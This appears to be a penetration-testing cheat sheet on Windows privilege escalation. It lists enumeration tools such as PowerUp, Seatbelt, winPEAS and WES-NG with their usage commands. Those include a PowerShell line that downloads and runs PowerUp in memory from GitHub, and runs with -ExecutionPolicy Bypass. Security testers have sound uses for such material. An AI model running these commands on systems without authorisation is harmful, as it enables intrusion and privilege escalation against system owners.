Tools
1. Tools Overview
This document provides an organized overview of enumeration and exploitation tools used for privilege escalation on Windows systems.
1.1 Enumeration Tools
These tools are essential for identifying vulnerabilities and misconfigurations that could lead to privilege escalation.
Tool
Description
PowerSploit’s PowerUp
PowerShell script for identifying and exploiting local privilege escalation vulnerabilities.
Watson
C# implementation for detecting vulnerabilities in Windows, similar to the deprecated Sherlock tool.
Sherlock (Deprecated)
PowerShell script for identifying missing patches for privilege escalation.
BeRoot
Cross-platform tool for privilege escalation checks on Windows, Linux, and Mac.
Windows Exploit Suggester (WES)
Suggests potential exploits based on system information and installed patches.
WindowsEnum
PowerShell script for privilege escalation enumeration on Windows.
Seatbelt
C# project for auditing security-related settings and configurations on Windows systems.
Powerless
Script focused on legacy Windows environments for privilege escalation enumeration.
JAWS
PowerShell script for comprehensive Windows enumeration.
winPEAS
Script for identifying privilege escalation vectors on Windows.
Windows Exploit Suggester - Next Generation (WES-NG)
Updated version of WES for accurate exploit suggestions.
PrivescCheck
Standalone executable for checking common privilege escalation vectors on Windows systems.
2. Privilege Escalation Techniques
2.1 Enumeration Tools: Usage Instructions
The following section details how to use specific enumeration tools to gather system information and identify potential vulnerabilities.
PowerSploit’s PowerUp
Usage:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerSploit/master/Privesc/PowerUp.ps1')Watson
Usage: Compile or download Watson to use in .NET environments.
Windows Exploit Suggester
Initial Steps:
systeminfo > systeminfo.txt
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txtSeatbelt
Full Security Check:
Seatbelt.exe -group=all -fullwinPEAS
Usage:
Download and execute winPEAS on the target machine.
2.2 Exploitation Tools
Once vulnerabilities are identified, these tools can assist in exploitation.
BeRoot
Usage: Run the appropriate version for the target OS and follow prompts for privilege escalation checks.
PrivescCheck
Usage:
powershell -ExecutionPolicy Bypass -File .\PrivescCheck.ps1
powershell -ExecutionPolicy Bypass -File .\PrivescCheck.ps1; Invoke-PrivescCheck -ExtendedJAWS
Usage:
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txtWindows Exploit Suggester - Next Generation (WES-NG)
Usage:
python3 wes.py --update
python3 wes.py systeminfo.txt3. Usage Instructions
3.1 Initial System Information Gathering
Begin by collecting essential system information for analysis and exploitation strategy development:
systeminfo > systeminfo.txt3.2 Updating and Running Windows Exploit Suggester
Update the Windows Exploit Suggester database and analyze the collected system information:
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py systeminfo.txt3.3 Running Seatbelt for a Comprehensive Check
Conduct a full security audit using Seatbelt:
Seatbelt.exe -group=all -full -outputfile="C:\Temp\seatbelt_report.txt"3.4 Executing PowerUp
Scan for privilege escalation vulnerabilities using PowerUp:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerSploit/master/Privesc/PowerUp.ps1')Last updated